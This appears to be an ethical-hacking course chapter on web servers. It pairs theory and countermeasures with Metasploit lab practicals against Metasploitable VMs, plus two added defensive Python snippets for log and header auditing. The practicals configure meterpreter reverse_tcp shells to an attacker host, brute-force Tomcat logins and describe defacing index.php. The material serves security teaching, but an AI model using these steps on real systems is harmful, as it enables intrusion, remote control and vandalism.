
13. Hacking Webservers

Web servers process HTTP/HTTPS requests to serve web pages, and any computer can become a web server with the right software. Common web servers include Apache, IIS, and Nginx, each with unique features and vulnerabilities. Security measures are crucial to protect against various attacks, such as denial of service and SQL injection, and to ensure proper configuration and response handling.

Uploaded by

mpraveen7321
Copyright
© All Rights Reserved

Web Servers

A web server is a computing system that runs on a server OS to process
HTTP/HTTPS requests and serve web pages on the World Wide Web. The
pages delivered are HTML documents, which may include images and scripts in
addition to the text content. Clients use a web browser to interact with the web
server.
Any computer can be turned into a web server by installing server
software and connecting the machine to the Internet. There are many web
server software applications, such as XAMPP, Apache, Nginx, and IIS.

How Web Servers Work?


When a user requests a web page hosted on the internet, the web server
responds with that requested page. The below image represents this process.

Obtaining the IP address from the domain name: The web browser first takes the
domain name and resolves it to an IP address. It can obtain the IP address in 2
ways:
1. By searching the cache.
2. By requesting one or more DNS servers.

After obtaining the IP address, the browser requests the full URL from the
web server. The web server responds by sending the requested page to the
browser; if the web page does not exist, it returns an appropriate
error message. The browser renders the response received from the server to
display it on the screen.

List of popular web servers


The following is a list of the common web servers:
Apache – The most commonly used web server on the internet. It is cross-platform
application software, but it is usually installed on Linux. Most PHP websites are
hosted on Apache servers.

www.hackerschool.in
Internet Information Services (IIS) – It runs on Windows and is the second
most used web server on the internet. Most websites built using ASP.NET are
hosted on IIS servers.

Apache Tomcat – Java server pages (JSP) websites are hosted on this type of
web server.

Other web servers – Novell's Web Server, IBM Lotus Domino servers,
Cloudflare web server, Oracle web server, LiteSpeed servers, Amazon web
server, Google web server, Nginx, etc.

Footprinting Web Server


● Attackers use tools such as ID Serve, Netcraft, HTTP Recon, and Whois to get
details about the target server.
● The robots exclusion protocol, a standard used by websites to
communicate with web crawlers and other web robots, can be used to gather some
sensitive information.
● The robots.txt file informs web robots about which areas of the
website should not be processed or scanned.
● By performing DNS enumeration, we can get the DNS records and
types of servers.

Web Server Vulnerabilities


The following vulnerabilities are most commonly exploited in web servers:
● Improper file and directory permissions.
● Unnecessary services enabled, including content management and remote
administration.
● Improper authentication with external systems.
● Default accounts with default or no passwords.
● Misconfiguration in web-server, operating system or network.
● Bugs in server software, OS or web application.
● Lack of security policy and procedures

Types of Attacks possible against Web Servers


Denial of Service Attacks – With this type of attack, the web server may crash
or become unavailable to the legitimate users.

Domain Name System Hijacking – In this type of attack, the DNS settings are
changed to point victims to the attacker’s web server. All the traffic that was
supposed to reach the legitimate server is sent to a malicious server instead.

Sniffing – Unencrypted data sent over the network may be intercepted and used
to gain unauthorized access to the web server.

Defacement – In this type of attack, the attacker takes advantage of
vulnerabilities in the web server to replace the organization’s website with a
different page that contains the hacker’s name and images, and may include
background music and messages.

Impact of Web Server Attacks


● Easy to compromise user accounts.
● Gaining root access to other applications on servers.
● Access to confidential data (Data tampering/Data theft).
● Perform Web Application attacks.
● The compromised web server can be used to spread malicious software
on the internet, which can infect users who visit the compromised
website.
● Compromised user data can be used for fraudulent activities.
● An organization’s reputation can be ruined.

Identify Vulnerabilities on Web Server


● Perform vulnerability scan to identify weaknesses in a network and
determine if the system can be exploited.
● Use vulnerability scanners like Sparta, Nikto, HP Web Inspect, Acunetix
Web Vulnerability Scanner to find out hosts, services, and vulnerabilities.
● Sniff the network traffic to identify vulnerabilities on active systems or
network services.
● Test the web server infrastructure for any misconfigurations, outdated
content, and vulnerabilities.

Webserver response codes


Webserver response codes are also known as Hypertext Transfer Protocol
(HTTP) response status codes. Status codes are issued by a server in response to
a client's request made to the server. The Internet Assigned Numbers Authority
(IANA) maintains the official registry of HTTP status codes.

All HTTP response status codes are separated into five categories. The
first digit of the status code specifies one of five standard classes of responses,
while the last two digits do not have any classifying or categorization role.
The five classes defined by the standard are:

• Informational responses (100–199)
• Successful responses (200–299)
• Redirects (300–399)
• Client errors (400–499)
• Server errors (500–599)

Common HTTP Status Codes

| Status code | Description |
|---|---|
| 200 OK | The request is OK. |
| 300 Multiple Choices | A link list. The user can select a link and go to that location. Maximum five addresses. |
| 301 Moved Permanently | The requested page has moved to a new URL. |
| 302 Found | The requested page has moved temporarily to a new URL. |
| 307 Temporary Redirect | The requested page has moved temporarily to a new URL. |
| 400 Bad Request | The server did not understand the request. |
| 401 Unauthorized | The requested page needs a username and a password. |
| 403 Forbidden | Access is forbidden to the requested page. |
| 404 Not Found | The server cannot find the requested page. |
| 405 Method Not Allowed | The method specified in the request is not allowed. |
| 408 Request Timeout | The request took longer than the server was prepared to wait. |
| 410 Gone | The requested page is no longer available. |
| 500 Internal Server Error | The request was not completed. The server met an unexpected condition. |
| 501 Not Implemented | The request was not completed. The server did not support the functionality required. |
| 502 Bad Gateway | The request was not completed. The server received an invalid response from the upstream server. |
| 503 Service Unavailable | The request was not completed. The server is temporarily overloaded or down. |
| 550 Permission Denied | The server is stating the account you have currently logged in as does not have permission to perform the action you are attempting. You may be trying to upload to the wrong directory or trying to delete a file. |
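
The status classes above are what access-log triage keys on. The following added example (not part of the original document) groups responses per client by class and flags clients whose traffic is mostly 4xx, a pattern typical of automated scanning; the log lines are constructed and the thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in Apache/Nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:04 +0000] "GET /old.php HTTP/1.1" 301 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:05 +0000] "GET /new.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:12 +0000] "POST /login.php HTTP/1.1" 200 870 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2024:10:01:00 +0000] "GET /admin/ HTTP/1.1" 404 196 "-" "scanner"
198.51.100.9 - - [10/Mar/2024:10:01:00 +0000] "GET /backup.zip HTTP/1.1" 404 196 "-" "scanner"
198.51.100.9 - - [10/Mar/2024:10:01:01 +0000] "GET /server-status HTTP/1.1" 403 199 "-" "scanner"
198.51.100.9 - - [10/Mar/2024:10:01:01 +0000] "GET /manager/html HTTP/1.1" 401 0 "-" "scanner"
198.51.100.9 - - [10/Mar/2024:10:01:02 +0000] "PROPFIND / HTTP/1.1" 405 0 "-" "scanner"
198.51.100.9 - - [10/Mar/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "scanner"
"""

CLASSES = {"1": "informational", "2": "success", "3": "redirect",
           "4": "client_error", "5": "server_error"}
# Captures: client IP, then the 3-digit status after the quoted request line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (\d{3}) ')

def status_class(code):
    """Classify by first digit only; the last two digits carry no class."""
    return CLASSES.get(str(code)[0], "unknown")

def per_client_classes(log_text):
    """Return {client_ip: Counter({class_name: count})}."""
    counts = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # skip lines that are not in the expected format
            counts[m.group(1)][status_class(m.group(2))] += 1
    return counts

def suspicious_clients(log_text, min_requests=5, max_4xx_ratio=0.6):
    """Clients with enough requests whose 4xx share exceeds the threshold."""
    flagged = []
    for ip, classes in per_client_classes(log_text).items():
        total = sum(classes.values())
        if total >= min_requests and classes["client_error"] / total > max_4xx_ratio:
            flagged.append(ip)
    return sorted(flagged)

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```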

Countermeasures
● Scan for existing vulnerabilities, patch and update the server software
regularly.
● Block all unnecessary ports, ICMP traffic, and unnecessary protocols.
● Consistently apply the latest software patches and update system
software.
● If remote access is needed, make sure that the remote connection is
adequately secured, by using tunneling and encryption protocols.
● Stop running vulnerable applications on the server, such as WebDAV.
Unnecessary applications can be removed on a server by using
Add/Remove Programs in the Windows Control Panel.
● Perform bounds checking on input for web forms and query strings to
prevent buffer overflow or malicious input attacks.
● Disable remote administration.
● Avoid printing error messages.
● Enable auditing and logging.
● Use a firewall between the web server and the Internet and allow only
necessary ports (such as 80 and 443) through the firewall.
● Replace the GET method with the POST method when sending data to a
web server.

INDEX
1. Scanning Web Server using Nikto
2. Hacking webserver using Metasploit framework
3. Hacking web server with the help of vulnerability in PHP
4. Hacking Tomcat Web Server with Metasploit Framework
5. Exploiting the vulnerable Drupal using Metasploit
6. Exploiting the Remote Code Execution vulnerability in Elasticsearch Web application

THIS DOCUMENT INCLUDES ADDITIONAL PRACTICALS WHICH MAY OR MAY NOT BE COVERED DURING
CLASSROOM TRAINING. FOR MORE DETAILS APPROACH LAB COORDINATORS

Practical 1: Scanning Web Server using Nikto
Description: In this practical you will learn how to scan web servers and identify
vulnerabilities present in web servers, using the Nikto tool.

Step 1: Nikto is used to identify vulnerabilities and misconfigurations on the server
that hosts web applications.
● Syntax: nikto -h <target web site>

● This tool will list possible vulnerabilities that can help an attacker to gain
access to the target server. In the above screenshot, the target website
http://testphp.vulnweb.com is not sending the X-XSS-Protection header (possibility
of XSS vulnerability) or the anti-clickjacking X-Frame-Options header, which
can allow attackers to perform web-application based attacks on the target
website.
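
The two header findings above can be checked on your own server's responses without a scanner. The following added example (not part of the original document or of Nikto) audits a raw HTTP response for them; it assumes a Content-Security-Policy with frame-ancestors counts as clickjacking protection and that any CSP is accepted in place of X-XSS-Protection, since major browsers have retired the XSS filter that header controlled. The sample responses are constructed.

```python
import re

# Constructed responses (not captured from any real server).
WEAK = ("HTTP/1.1 200 OK\r\nServer: ExampleServer/1.2.3\r\n"
        "Content-Type: text/html\r\n\r\n<html></html>")
HARDENED = ("HTTP/1.1 200 OK\r\nServer: ExampleServer\r\n"
            "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
            "X-Frame-Options: DENY\r\nContent-Type: text/html\r\n\r\n<html></html>")

def parse_headers(raw_response):
    """Return {lowercased-name: value} for the header block of a raw response."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = {}
    for line in head.split("\n")[1:]:            # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def audit_headers(raw_response):
    """Return a sorted list of finding codes for missing or weak headers."""
    h = parse_headers(raw_response)
    csp = h.get("content-security-policy", "")
    directives = {d.split()[0].lower() for d in csp.split(";") if d.strip()}
    findings = []
    xfo = h.get("x-frame-options", "").upper()
    if "frame-ancestors" not in directives:      # CSP supersedes X-Frame-Options
        if not xfo:
            findings.append("no-anti-clickjacking-header")
        elif xfo not in ("DENY", "SAMEORIGIN"):
            findings.append("weak-x-frame-options")
    if not directives and "x-xss-protection" not in h:
        findings.append("no-xss-header-or-csp")
    # A version number in the banner helps footprinting.
    if re.search(r"\d", h.get("server", "")) or "x-powered-by" in h:
        findings.append("version-disclosure")
    return sorted(findings)

if __name__ == "__main__":
    print("weak:", audit_headers(WEAK))
    print("hardened:", audit_headers(HARDENED))
```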

Practical 2: Hacking webserver using Metasploit framework
Description: In this practical we try to exploit weak WebDAV passwords on
XAMPP servers, using one of the Metasploit modules. It uses supplied credentials to
upload a PHP payload and execute it, and gives a reverse connection from the server.

Step 1: To run Metasploit Framework, execute the following commands in terminal


● service postgresql start
● msfconsole
● search for xampp_webdav

Step 2: Load exploit by executing the following command

Step 3: To view the exploit options, execute show options command

Step 4: Set the RHOST value

Step 5: Set the WebDAV server path to the PATH option

Step 6: Set meterpreter payload

Step 7: Set payload options (LHOST and LPORT)

Step 8: Execute the exploit to gain access to web server.

Practical 3: Hacking web server with the help of vulnerability in PHP
Description: In this practical we exploit web servers running PHP 5.2.4, using
the Metasploit framework.

Step 1: This practical works on web servers running PHP version 5.2.4. In this case,
we are considering Metasploitable2 OS as target machine.
● Load Metasploit Framework

Step 2: Search and load the php_cgi_arg exploit.

Step 3: Verify and configure required exploit options. Set a meterpreter payload to
gain more control on the target server.

Step 4: Once everything is configured, execute the exploit command to gain reverse
connection.

Step 5: With the help of the meterpreter session, we can deface the website located in
the web root of the target server. Execute ls command and look for the index.php
page, remove or replace this page with customized php page.

Practical 4: Hacking Tomcat Web Server with Metasploit Framework
Description: In this practical we try to exploit an Apache Tomcat server. First, using one
of the Metasploit modules, we perform a brute-force attack on the Tomcat server; if we get
login credentials, we proceed to the next step, which is exploiting the server. We use a
module that can execute a payload on Apache Tomcat servers that have an exposed
"manager" application.

Step 1: This practical works on web servers running tomcat server version 5.5. In
this case, we are considering Metasploitable2 OS as target machine.
● Start Metasploit framework

Step 2: At first, we need to crack username and password of tomcat service. Search
for tomcat and select auxiliary module to crack the password

Step 3: Load auxiliary, verify options and configure RHOSTS, RPORT values

Step 4: Execute exploit command to crack username and password of tomcat service.
In the results, a line which shows Login Successful indicates username, password of
tomcat service.

Step 5: Now, as we know login credentials, we can start exploiting the target. Search
for tomcat in Metasploit framework and select
exploit/multi/http/tomcat_mgr_deploy

Step 6: Load exploit and configure HttpPassword, HttpUsername to above-gathered
password and username of tomcat service. RHOST, RPORT to target’s IP
address and port number respectively.

Step 7: Configure a payload from available list of payloads and set payload options.

Step 8: Execute exploit command to gain meterpreter session.

Practical 5: Exploiting the vulnerable Drupal using Metasploit
Description: In this practical we will learn how to exploit the SQL injection
vulnerability present in the vulnerable Drupal version, and how to get php reverse
shell from that, using the module available in the Metasploit framework.

Step 1: Start the Metasploitable3 Ubuntu virtual machine. We identified that the Drupal
Content Management System was running on port 80.

Step 2: Open Metasploit framework and search for Drupal exploits.

Step 3: Execute the following command to load the exploit module.
● Command: use exploit/multi/http/drupal_drupageddon

Step 4: List the options available in the exploit module using show options
● Command: show options

Step 5: Configure the target IP to RHOSTS and target domain to TARGETURI
using the below commands.
● Syntax: set RHOSTS <Target IP>
▪ set TARGETURI <URL address of target>
● Command: set RHOSTS 10.0.2.15
▪ set TARGETURI drupal/

Step 6: Set payload by executing the following command.


● Command: set payload php/meterpreter/reverse_tcp

Step 7: Configure the attacker IP and port to the payload by executing the following
command.
● Syntax: set LHOST <Attacker IP>
▪ set LPORT <attacker port number>
● Command: set LHOST 10.0.2.4
▪ set LPORT 4545

Step 8: Execute the exploit command to start exploiting the vulnerability present in
the Drupal, after successful exploitation we will get a meterpreter session.

Step 9: Execute the following command to get target system information.

Practical 6: Exploiting the Remote Code Execution vulnerability in Elasticsearch Web application
Description: In this practical we will learn how to exploit the remote code execution
vulnerability present in the Elasticsearch web application and gain access to the target
system.

Step 1: After scanning the metasploitable3 windows server 2008, we will find
Elasticsearch is running on port 9200.

Step 2: Search for any exploits available in the Msfconsole. After searching we
identified the RCE exploit, we will use that to exploit the vulnerability in
Elasticsearch.

Step 3: Configure the above highlighted exploit module using the following
command.
● Command: use exploit/multi/elasticsearch/script_mvel_rce

Step 4: Execute show options to see the available options for exploit.

Step 5: Set TARGETIP in the RHOSTS by executing the following command.


● Syntax: set RHOSTS <Target IP>
● Command: set RHOSTS 10.0.2.5

Step 6: Set payload by executing the following command.


● Command: set payload java/meterpreter/reverse_tcp

Step 7: Set LHOST and LPORT options by executing the following commands.
● Syntax: set LHOST <Attacker IP>
▪ set LPORT <attacker port number>
● Command: set LHOST 10.0.2.4
▪ set LPORT 4567

Step 8: Execute exploit command to start exploiting the vulnerability and gain access
to the target system
